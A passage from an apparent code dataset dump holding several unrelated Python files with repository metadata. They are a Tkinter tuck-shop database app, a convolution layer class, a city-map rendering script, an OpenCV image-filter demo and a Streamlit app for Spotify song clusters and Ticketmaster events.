top_up_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n top_up_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W),\n top_up_entry.focus(),\n top_up_btn.config(command=lambda: self.combine_funcs(\n var[2].set(\"£{:.2f}\".format(float(var[2].get()[1:]) + float(budget.get() if is_number(budget.get())\n else 0 if budget.get() != ''\n else 0))),\n top_up_btn.grid_forget(), top_up_btn_set(), budget.set('')))))\n top_up_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n Label(frames[2], text='Budget', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[2].set('£0.00')\n Label(frames[2], textvariable=var[2], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n top_up_btn_set()\n Grid.columnconfigure(frames[2], 2, weight=1)\n budget = StringVar()\n top_up_entry = Entry(frames[2], textvariable=budget, font=font2, width=int(width / 2), bg=entries_colour)\n\n discount_frame = Frame(frames[3], bg=frames_colour)\n Label(frames[3], text='Discount', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[3].set(\"%\")\n opt_menu_1 = OptionMenu(discount_frame, var[3], \"%\", \"£\")\n opt_menu_1.config(font=font2, bg=entries_colour)\n opt_menu_1.nametowidget(opt_menu_1.menuname).configure(font=font2, bg=entries_colour)\n opt_menu_1.grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n discount_amount = Entry(discount_frame, textvariable=var[4], font=font2, width=int(width / 3),\n bg=entries_colour)\n discount_amount.grid(row=0, column=1, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(discount_frame, 0, weight=1)\n time_period_frame_setter(frames[3], discount_frame, 0, var[5], var[6])\n\n spending_limit_frame = Frame(frames[4], bg=frames_colour)\n Label(frames[4], text='Spending Limit', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Grid.columnconfigure(spending_limit_frame, 1, weight=1)\n Label(spending_limit_frame, text='£', font=font2, bg=lbls_colour) \\\n .grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n Entry(spending_limit_frame, textvariable=var[7], font=font2, width=int(width / 3), bg=entries_colour)\\\n .grid(row=0, column=1, pady=pady * 2, sticky=N + S)\n Label(spending_limit_frame, text='per', font=font2, bg=lbls_colour)\\\n .grid(row=0, column=2, pady=pady * 2, sticky=N + S)\n var[8].set(\"purchase\")\n opt_menu_3 = OptionMenu(spending_limit_frame, var[8], \"purchase\", \"day\", \"week\", \"month\")\n opt_menu_3.config(font=font2, bg=entries_colour)\n opt_menu_3.nametowidget(opt_menu_3.menuname).configure(font=font2, bg=entries_colour)\n opt_menu_3.grid(row=0, column=3, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(spending_limit_frame, 0, weight=1)\n time_period_frame_setter(frames[4], spending_limit_frame, 1, var[9], var[10])\n\n sub_zero_frame = Frame(frames[5], bg=frames_colour)\n Label(frames[5], text='Sub-Zero Allowance', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Label(sub_zero_frame, text='£', font=font2, bg=lbls_colour) \\\n .grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n Entry(sub_zero_frame, textvariable=var[11], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(sub_zero_frame, 0, weight=1)\n time_period_frame_setter(frames[5], sub_zero_frame, 2, var[12], var[13])\n\n Label(frames[6], text='Notes', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[6], textvariable=var[14], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[6], 1, weight=1)\n\n else: # table == \"products\"\n frames = list()\n for i in range(5): # create frames for form fields\n frames.append(Frame(center_frame, bg=frames_colour, height=60, width=400))\n frames[i].grid(row=i, column=0, columnspan=2, pady=pady, sticky=E + W)\n\n i += 1\n Label(frames[0], text='Product Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[0], textvariable=var[0], font=font2, width=width * 3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[0], 1, weight=1)\n\n Label(frames[1], text='Cost Price', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[1].set('£0.00')\n Entry(frames[1], textvariable=var[1], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n\n def set_price_btn_set():\n \"\"\"sets the set price btn\"\"\" # used so that the set price btn can be reset once set up\n set_price_btn = Button(\n frames[2], text=\"Set Selling Price\" if info is None else \"Edit Selling Price\", font=font2,\n width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n set_price_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n set_price_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W),\n set_price_entry.focus(),\n set_price_btn.config(command=lambda: self.combine_funcs(\n var[2].set(\"£{:.2f}\".format(float(price.get() if is_number(price.get()) else 0\n if price.get() != '' else 0))),\n set_price_btn.grid_forget(), set_price_btn_set(), price.set('')))))\n set_price_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n def top_up_btn_set():\n \"\"\"sets the top up qty btn\"\"\" # used so that the top up btn can be reset once topped up\n top_up_btn = Button(\n frames[3], text='Top Up Qty', font=font2, width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n set_qty_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n top_up_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W),\n set_qty_entry.focus(),\n top_up_btn.config(command=lambda: self.combine_funcs(\n var[3].set(\"{}\".format(\n int(var[3].get()) +\n int(qty.get() if is_number(qty.get()) else 0 if qty.get() != '' else 0))),\n top_up_btn.grid_forget(), top_up_btn_set(), qty.set('')))))\n top_up_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n # !!--------------------- Should warn user if user attempts to save product and has clicked on set_selling_\n # price but not confirmed amount ---------------------!!\n Label(frames[2], text='Selling Price', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[2].set('£0.00')\n Label(frames[2], textvariable=var[2], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n set_price_btn_set()\n Grid.columnconfigure(frames[2], 2, weight=1)\n price = StringVar()\n set_price_entry = Entry(frames[2], textvariable=price, font=font2, width=int(width / 2), bg=entries_colour)\n\n Label(frames[3], text='Quantity', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[3].set('0')\n Label(frames[3], textvariable=var[3], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n top_up_btn_set()\n Grid.columnconfigure(frames[3], 2, weight=1)\n qty = StringVar()\n set_qty_entry = Entry(frames[3], textvariable=qty, font=font2, width=int(width / 2), bg=entries_colour)\n\n Label(frames[4], text='Notes', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[4], textvariable=var[4], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[4], 1, weight=1)\n\n def curr_details(): # returns a list of all variables in order\n results = list()\n [results.append(item.get()) for item in var[:3]], results.append(time_codes[0].get()), \\\n [results.append(item.get()) for item in var[3:7]], results.append(time_codes[1].get()), \\\n [results.append(item.get()) for item in var[7:11]], results.append(time_codes[2].get()), \\\n [results.append(item.get()) for item in var[11:]]\n return results\n\n data_valid = BooleanVar()\n if info is not None: # edit\n def edit(): # for the sake of binding the enter key\n self.data_deleter(table, self.get_columns(table)[0], info[0])\n data_valid.set(self.data_appender(table, curr_details()))\n self.data_appender(table, [item for item in info[1:-1]]) if not data_valid.get() else caller(page_num)\n\n btn_frame = Frame(center_frame, bg='grey70')\n btn_frame.grid(row=i, column=0, columnspan=2, sticky=E + W)\n\n cancel_btn = Button(btn_frame, text=\"Cancel\", font=font1, bg=\"orange\", width=width,\n command=lambda: caller(page_num))\n cancel_btn.grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n save_btn = Button(btn_frame, text=\"Save\", font=font1, bg=\"orange\", width=width,\n command=lambda: edit())\n save_btn.grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n delete_btn = Button(btn_frame, text=\"Delete\", font=font1, bg=\"red\", width=width,\n command=lambda: self.combine_funcs(\n self.data_deleter(table, self.get_columns(table)[0], info[0]), caller(page_num)))\n delete_btn.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n Grid.columnconfigure(btn_frame, 0, weight=1)\n Grid.columnconfigure(btn_frame, 1, weight=1)\n Grid.columnconfigure(btn_frame, 2, weight=1)\n\n self.delete.append(info[0])\n else: # add\n def add(): # for the sake of binding the enter key\n caller(page_num) if self.data_appender(table, curr_details()) else None\n\n cancel_btn = Button(center_frame, text=\"Cancel\", font=font1, bg=\"orange\", width=width,\n command=lambda: caller(page_num))\n cancel_btn.grid(row=i, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n add_btn = Button(center_frame, text=\"Add\", font=font1, bg=\"orange\", width=width,\n command=lambda: add())\n add_btn.grid(row=i, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W + E)\n\n [time_codes[i].set(0) for i in range(3)]\n\n for i in range(len(self.get_columns(table)[1:-1]) + 1):\n Grid.rowconfigure(center_frame, i, weight=1)\n Grid.columnconfigure(center_frame, 0, weight=1)\n Grid.columnconfigure(center_frame, 1, weight=1)\n Grid.columnconfigure(center_frame, 2, weight=0)\n Grid.columnconfigure(center_frame, 3, weight=0)\n\n def get_columns(self, table):\n \"\"\"returns column names for given table\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute('SELECT * FROM {}'.format(table))\n columns = [description[0] for description in cursor.description]\n connection.close()\n return columns\n\n def data_deleter(self, table, column_name, item_id):\n \"\"\"deletes items from database using table name, column name and record value for given column\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"\"\"DELETE FROM {} WHERE {} = ?;\"\"\".format(table, column_name), (item_id,))\n connection.commit()\n connection.close()\n\n def error_decoder(self, code):\n \"\"\"returns error message for given error code for user\"\"\"\n\n if code == 1:\n return \"missing first / last name\"\n elif code == 2:\n return \"invalid character used in name\"\n elif code == 3:\n return \"multiple decimal places used\"\n elif code == 4:\n return \"only numbers can be used (and optional single decimal place) - applies to 'budget', 'discount', \" \\\n \"'spending limit' and 'sub zero allowance'\"\n elif code == 5:\n return \"invalid date entered - please use the date helper by simply clicking on the date entry box\"\n elif code == 6:\n return \"date cannot have passed (or be today)\"\n elif code == 7:\n return \"number of weeks entered is not a valid number\"\n\n def data_appender(self, table, *args, silence=False):\n \"\"\"appends given data into database but first checks for validity including if item is duplicate\"\"\"\n items = self.table_reader(table)\n code, data = self.account_data_validator(args[0], table)\n\n if code != 0:\n if not silence:\n tkinter.messagebox.showerror(\"Data Validity Error\",\n \"There is a problem with the entered data.\"\n \"\\n\\nError Code: {}\\n\\nError Msg: {}\".format(code,\n self.error_decoder(code)))\n return False\n\n duplicate = False\n for item in items:\n if data[0] == item[1]:\n if table == 'accounts' and data[1] != item[2]:\n continue\n if not silence:\n tkinter.messagebox.showerror(\"Duplicate\",\n \"Entry already exists!\\n\\nPlease alter the name to continue.\")\n return False\n\n if not duplicate:\n num_of_vals = str()\n for _ in range(len(self.get_columns(table)) - 1):\n num_of_vals += '?, '\n num_of_vals = num_of_vals[:-2]\n\n values = list()\n [values.append(val) for val in data], values.append(datetime.datetime.now())\n\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"INSERT INTO {} VALUES (NULL, {});\".format(table, num_of_vals), values)\n connection.commit()\n connection.close()\n\n return True\n\n def get_accounts(self):\n \"\"\"returns all accounts\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"\"\"SELECT * FROM accounts ORDER BY l_name, f_name;\"\"\")\n accounts = cursor.fetchall()\n connection.close()\n return accounts\n\n def csv_reader(self, csv_address, depth=2):\n \"\"\"imports csv and breaks it up into a returned list\"\"\"\n\n try:\n with open(csv_address, 'r', encoding=\"UTF-8\") as file:\n file = file.read()\n csv = file.split('\\n')\n if depth == 2:\n for i in range(len(csv)):\n csv[i] = csv[i].split(',')\n csv = csv[:-1] if csv[-1][0] == '' else csv\n except FileNotFoundError:\n csv = ''\n\n return csv\n\n def account_data_validator(self, data, table):\n \"\"\"verifies validity of data; returns the input data\"\"\"\n # (or, if possible, amended input data) as well as a code to identify whether the data is valid or if there is\n # an error (and if so, what that error is)\n\n # ensures the right number of items are in the data array (used for importing)\n size = len(self.get_columns(table)[1:-1])\n if len(data) < 2:\n return False\n while len(data) > size:\n del data[-1]\n while len(data) < size:\n data.append('')\n\n code = 0\n until_date, for_time = bool(), bool()\n\n for i in range(len(data)):\n column_name = self.get_columns(table)[i + 1]\n\n if column_name in ['f_name', 'l_name']:\n data[i] = data[i].capitalize()\n if data[i] == '':\n code = 1 # missing first / last name\n for char in data[i]:\n if not (char.lower() in self.letters or char in self.numbers or char in '_- '):\n code = 2 # invalid char used in name\n\n if column_name in ['budget', 'discount_3', 'spending_limit_2', 'sub_zero_allowance_2']:\n if str(data[i]).count('.') > 1:\n code = 3 # multiple decimal places used\n for symbol in '£$%': # remove above symbols because numbers are stored without them\n data[i] = str(data[i]).replace(symbol, '')\n if data[i] == '': # if just left empty\n continue\n for char in data[i]:\n if not (char in self.numbers or char == '.'):\n code = 4 # only numbers can be used (and optional single decimal place)\n\n if column_name in ['discount_1', 'spending_limit_1', 'sub_zero_allowance_1']: # for locating invalid date\n # entries but only applies if the date time frame has been chosen\n if data[i] == 2:\n until_date = True\n if data[i] == 3:\n for_time = True\n\n if column_name in ['discount_4', 'spending_limit_4', 'sub_zero_allowance_3']:\n if until_date:\n until_date = False\n if not 10 <= len(data[i]) <= 10:\n code = 5 # invalid date\n continue\n try:\n datetime.datetime(int(data[i].split('-')[0]), int(data[i].split('-')[1]),\n int(data[i].split('-')[2]))\n except (ValueError, IndexError):\n code = 5 # invalid date\n if code != 5:\n if datetime.datetime(int(data[i].split('-')[0]), int(data[i].split('-')[1]),\n int(data[i].split('-')[2])) < datetime.datetime.now():\n code = 6 # date has passed (or is today)\n if for_time:\n try:\n data[i] = int(data[i])\n except ValueError:\n code = 7 # for x time ensures integer is used\n\n return code, data\n\n def importer(self, csv_address, table):\n \"\"\"imports data from external csv file to a local csv file\"\"\"\n\n try: # sort out if user cancels looking for csv address\n csv = self.csv_reader(csv_address)\n\n for i in range(len(csv)):\n csv[i][0] = csv[i][0].lower().capitalize()\n csv[i][1] = csv[i][1].lower().capitalize()\n\n for i in range(len(csv)): # send data for validation\n try:\n code, csv[i] = self.account_data_validator(csv[i], table)\n except IndexError:\n pass\n\n # remove invalid items such as empty or False items\n for _ in range(csv.count('')):\n csv.remove('')\n invalid_accounts = int()\n for _ in range(csv.count(False)):\n csv.remove(False)\n invalid_accounts += 1\n\n # imports into given account\n success = int()\n for item in csv:\n success += self.data_appender(table, item, silence=True)\n\n extra_msg = \"\\n\\nThe remaining {} were not imported either because they were duplicates or because the \" \\\n \"data is not in the appropriate order.\"\n tkinter.messagebox.showinfo(\"Import Results\",\n \"Out of all {} found row(s) in the csv {} were successfully imported.{}\".format(\n len(csv), success, extra_msg.format(len(csv) - success)\n if success < len(csv) else \"\"))\n\n except TypeError:\n pass\n\n def page_populator(self, frame, items, page, table, caller):\n \"\"\"populates the given frame with the given items up to a hardcoded limit for any given page\"\"\"\n\n for widget in frame.winfo_children():\n widget.destroy()\n\n offset = (page - 1) * self.page_items_width * self.page_items_height\n btn, i = dict(), int()\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(frame, k, weight=1)\n try:\n btn[i] = Button(frame, text=\"{} {}\".format(items[i+offset][1], items[i+offset][2])\n if table == 'accounts' else \"{}\".format(items[i+offset][1]),\n font=(\"Calibri\", \"14\", \"bold\"), width=6, height=2,\n command=lambda item=items[i+offset]: self.item_form(1, page, table, caller, item)\n if caller != self.shop else caller(user=item))\n btn[i].grid(row=j, column=k, padx=15, pady=5, sticky=E+W)\n except IndexError:\n break\n i += 1\n\n def products(self, page_num=1):\n \"\"\"provides the appropriate data for the setup_window_generator to generate the products window (see the\n generator itself for functionality)\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()]\n\n self.setup_window_generator(page_num, 'products', self.item_form, self.table_reader, self.products)\n\n def table_reader(self, table, *orders):\n \"\"\"loads all items from given table into a dictionary using search and sort parameters when provided\"\"\"\n # it first files the list down according to any search terms, sorts them alphabetically according to given\n # columns and then returns them.\n # Function starts by building an SQL search query which must have it's syntax exact and then proceeds to execute\n # the query\n\n connection, cursor = self.db_opener(\"tuck.db\")\n sql_command, search, order_by = \"\"\"SELECT * FROM {};\"\"\".format(table), '', ''\n\n for char in self.search:\n search += char\n try:\n search = search[:-1] if search[-1] == ' ' else search\n except IndexError:\n pass\n\n for order in orders:\n if order is not None:\n order_by += '\\\"' + order + '\\\", '\n order_by = order_by[:-2]\n\n if search != '':\n sql_command = sql_command[:-1]\n sql_command += ' WHERE '\n\n for _ in range(search.count(' ') + 1):\n sql_command += '\\\"{}\\\" LIKE ? OR '.format('f_name' if table == 'accounts' else 'p_name')\n sql_command = sql_command + '\\\"l_name\\\" LIKE ? OR ' if table == 'accounts' else sql_command\n sql_command = sql_command[:-4] + ';'\n\n if order_by != '':\n sql_command = sql_command[:-1]\n sql_command += ' ORDER BY ' + order_by + ';'\n\n if search != '':\n search_ = ['%' + search.split(' ')[i] + '%' for i in range(search.count(' ') + 1)]\n search = [search_[i//2] for i in range(len(search_)*2)] if table == 'accounts' else search_\n\n # print('sql_command:', sql_command)\n # print('search', search)\n\n cursor.execute(sql_command, search)\n else:\n cursor.execute(sql_command)\n\n table = cursor.fetchall()\n connection.close()\n\n return table\n\n def combine_funcs(*funcs):\n \"\"\"enables multiple functions to be called serially inline\"\"\"\n\n def combined_func(*args, **kwargs):\n [f(*args, **kwargs) for f in funcs]\n\n return combined_func\n\n\n# help(TuckProgram)\nif __name__ == \"__main__\":\n start = TuckProgram()\n","repo_name":"danielsamet/Tuck-Program","sub_path":"OLD/tuckProgram.py","file_name":"tuckProgram.py","file_ext":"py","file_size_in_byte":76196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23164368735","text":"class Convolution:\n def __init__(self, filter_size=32, filter_shape=(3, 3), activation='relu', input_shape=None):\n self.filter_size = filter_size\n self.filter_shape = filter_shape\n self.activation = activation\n self.input_shape = input_shape\n\n @staticmethod\n def stringify_two_d(_input):\n return \"{}x{}\".format(_input[0], _input[1])\n\n @staticmethod\n def stringify_three_d(_input):\n return \"{}x{}x{}\".format(_input[0], _input[1], _input[2])\n\n def __str__(self):\n gen_str = \"conv::filter_size={},filter_shape={},activation={}\".format(\n self.filter_size,\n self.stringify_two_d(self.filter_shape),\n self.activation\n )\n if self.input_shape is not None:\n gen_str += \",input_shape={}\".format(self.stringify_three_d(self.input_shape))\n gen_str += \";\"\n return gen_str\n","repo_name":"khallaghi/denser","sub_path":"genetic_algorithm/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15625143389","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8\n# *****************************************************************************#\n\nfrom __future__ import annotations\n\nfrom pathlib import Path\n\nfrom geopy.geocoders import Nominatim\n\nfrom add_text import add_city_name\nfrom generate_map import Map\nfrom palette import load_colour_palettes\n\nPLACES = [\n #{\"city\": \"Hong Kong\", \"radius\": 5000},\n #{\"city\": \"Bangkok\", \"radius\": 5000},\n #{\"city\": \"London\", \"radius\": 5000},\n #{\"city\": \"Macau\", \"radius\": 5000},\n #{\"city\": \"Singapore\", \"radius\": 5000},\n #{\"city\": \"Paris\", \"radius\": 5000},\n {\"city\": \"Dubai\", \"radius\": 5000},\n #{\"city\": \"New York City\", \"radius\": 5000},\n #{\"city\": \"Kuala Lumpur\", \"radius\": 5000},\n #{\"city\": \"Istanbul\", \"radius\": 5000},\n]\n\nPALETTES = [\n #\"onedark\",\n \"yesterday-night\",\n]\n\npalettes = load_colour_palettes(Path(\"base16_schemes.json\"))\n\nfor place in PLACES:\n geolocator = Nominatim(user_agent=\"map_plotter\")\n location = geolocator.geocode(place[\"city\"])\n place_metadata = geolocator.reverse(location.point)\n\n EXPORT_DIR = Path(\"export\") / place[\"city\"]\n EXPORT_DIR.mkdir(exist_ok=True, parents=True)\n\n map = Map((location.latitude, location.longitude), place[\"radius\"])\n\n\n for palette in PALETTES:\n place_cleaned = place[\"city\"].replace(' ', '_').replace(',', '')\n map.export_image(\n destination=EXPORT_DIR / f\"{place_cleaned}_{palette}.png\",\n palette_name=palette,\n palette=palettes[palette],\n )\n\n add_city_name(\n input_image = EXPORT_DIR / f\"{place_cleaned}_{palette}.png\",\n place_name = place[\"city\"],\n output_image = EXPORT_DIR / f\"{place_cleaned}_{palette}_named.png\",\n palette = palettes[palette],\n )\n","repo_name":"dylan-robins/PrettyOSMRenderer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12256450967","text":"\"\"\"\n*Python file to make gaussian kernel and then blur image\n*outputs blurred img\n*\n\"\"\"\n\nimport cv2\nimport math\nimport numpy as np\nimport gaussKernel\n\nimg =cv2.imread('Lenna.png')\nr=5\nh=np.zeros((r, r))\n\n#python needs size of kernel\nkernel = np.ones((r,r), np.uint8)\n\n#own function in same folder\nh=gaussKernel.gaussKernel(r)\nimgOut = cv2.filter2D(img, -1, h)\n\n#python needs size of kernel\nkernel = np.ones((15,15), np.uint8)\n\n#erode checks kernel if any px is dark, darkens current px\n#dilate checks kernel if any px is light, lightens current px\nimgOutE = cv2.erode(img, kernel, iterations=1)\nimgOutD = cv2.dilate(img, kernel, iterations=1)\n\ncv2.imshow('image', img)\ncv2.imshow('gaussianBlur', imgOut)\ncv2.imshow('erode', imgOutE)\ncv2.imshow('dilate', imgOutD)\nprint(np.matrix(h))\n#wait for end key q\ncv2.waitKey(0)\n","repo_name":"rsashna/basicPyImgPro","sub_path":"blurImg.py","file_name":"blurImg.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16755145146","text":"import streamlit as st\nimport cluster as cl\nimport pandas as pd\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nimport folium\nfrom streamlit_folium import folium_static\n\n\nClient_id=os.getenv(\"client_id\")\nClient_secret=os.getenv(\"client_secret\")\nRedirect_uri=os.getenv(\"redirect_uri\")\n\n\nst.set_page_config(page_title=\"Your Music Your World\")\nst.markdown(\"

    Your Music Your World

    \", unsafe_allow_html=True)\nst.markdown(\"---\")\n\nst.sidebar.markdown(\"

    Index

    \", unsafe_allow_html=True)\nnav_buttons = [\"Introduction\", \"Liked Songs Clusters\", \"Ticketmaster\"]\nbutton_clicked = st.sidebar.radio(\"\", nav_buttons)\n\nst.sidebar.markdown(\"---\")\nif button_clicked == \"Introduction\":\n st.markdown(\"

    Music is a powerful form of expression and a window into our souls

    \", unsafe_allow_html=True)\n st.image(\"../images/Portada.jpg\")\n st.write(\"🎧🔍 This project analyzes your music preferences using data from your liked songs on Spotify and creates personalized playlists for two different moods: 🕯️ tranquil and melancholic, and 💃 motivated and cheerful. It also suggests concerts in your area featuring your favorite artists using the 🎫 Ticketmaster API.\")\n\n\nelif button_clicked == \"Liked Songs Clusters\":\n st.markdown(\"

    Spotify Songs Features

    \", unsafe_allow_html=True)\n st.markdown(\"First lets understand songs features:\")\n features = {\n \"DANCEABILITY💃\": \"Describes how suitable a track is for dancing based on musical elements like tempo, rhythm stability, beat strength, and overall regularity.\",\n \"ENERGY🔥\": \"Measures the intensity and activity of a track. Energetic tracks are usually fast, loud, and noisy.\",\n \"LOUDNESS🔊\": \"Refers to the overall volume of a track.\",\n \"SPEECHINESS🗣️\": \"Measures the presence of spoken words in a track. Tracks with high speechiness are typically spoken word or rap.\",\n \"ACOUSTINESS🎸\": \"Measures the degree to which a track is acoustic (versus electronic). High acousticness means the track is mostly acoustic.\",\n \"VALENCE😊\": \"Describes the musical positivity of a track. Tracks with high valence sound more positive (happy, cheerful, etc.)\"\n}\n\n# Create an expander for each feature\n for feature, definition in features.items():\n expander = st.expander(feature)\n with expander:\n st.write(definition)\n\n st.write(\"🎵🌧️ Melancholic Recommendations: Acoustic songs with lower 'Energy' and speechiness are perfect for the quiet and melancolic mood.\")\n\n st.write(\"🎵☀️ Happy Recommendations: Songs with high 'Energy', as well as high 'Happiness' and 'Positivity' are perfect for a happy mood to get you up and dancing.\")\n\n df=pd.read_csv(\"../data/songs_you_like_clusterfeatures.csv\", index_col=0)\n features = ['Danceability', 'Energy','Loudness', 'Speechiness', 'Acousticness', 'Valence']\n st.markdown(\"

    Connect to your Spotify 🤍 Songs

    \", unsafe_allow_html=True)\n \n \n cluster_stats= pd.read_csv(\"../data/cluster_stats.csv\", index_col = 0 )\n fig=cl.radar_plot(cluster_stats)\n st.pyplot(fig)\n \n if st.button(\"Create playlist\"):\n st.image(\"../images/Sunshine_State_of_mind.png\", caption=\"Sunshine State of Mind\")\n st.image(\"../images/Echoes_of_solitude.png\", caption=\"Echoes of Solitude\")\n\nelif button_clicked == \"Ticketmaster\":\n st.image(\"../images/ticketmaster.png\")\n st.sidebar.markdown(\"# Choose your perfect Ticketmaster Event \")\n st.write(\"Use the sidebar to fill your selection\")\n\n df_events=pd.read_csv(\"../data/df_events.csv\", index_col=0)\n \n #select your event \n st.markdown(\"## Find your perfect Ticketmaster Event \")\n #select country\n selected_country = st.sidebar.selectbox(\"Select a Country\", df_events[\"event_country\"].unique())\n filtered_df = df_events[df_events[\"event_country\"] == selected_country]\n #select year date\n selected_year = st.sidebar.selectbox(\"Select a Year\", df_events[df_events[\"event_country\"] == selected_country][\"year\"].unique())\n selected_month = st.sidebar.selectbox(\"Select a Month\", df_events[df_events[\"event_country\"] == selected_country][df_events[\"year\"] == selected_year][\"month\"].unique())\n\n filtered_df = filtered_df[filtered_df[\"year\"] == selected_year]\n filtered_df = filtered_df[filtered_df[\"month\"] == selected_month]\n\n #center the map\n center_lat = filtered_df[\"event_lat\"].mean()\n center_long = filtered_df[\"event_long\"].mean()\n m = folium.Map(location=[center_lat, center_long], zoom_start=3)\n for index, row in filtered_df.iterrows():\n event_name = row['event_name']\n event_city = row['event_city']\n event_lat = row['event_lat']\n event_long = row['event_long']\n artist = row['artist']\n url = row['url']\n \n # label shown\n popup_html = f'{event_name}
    {artist}
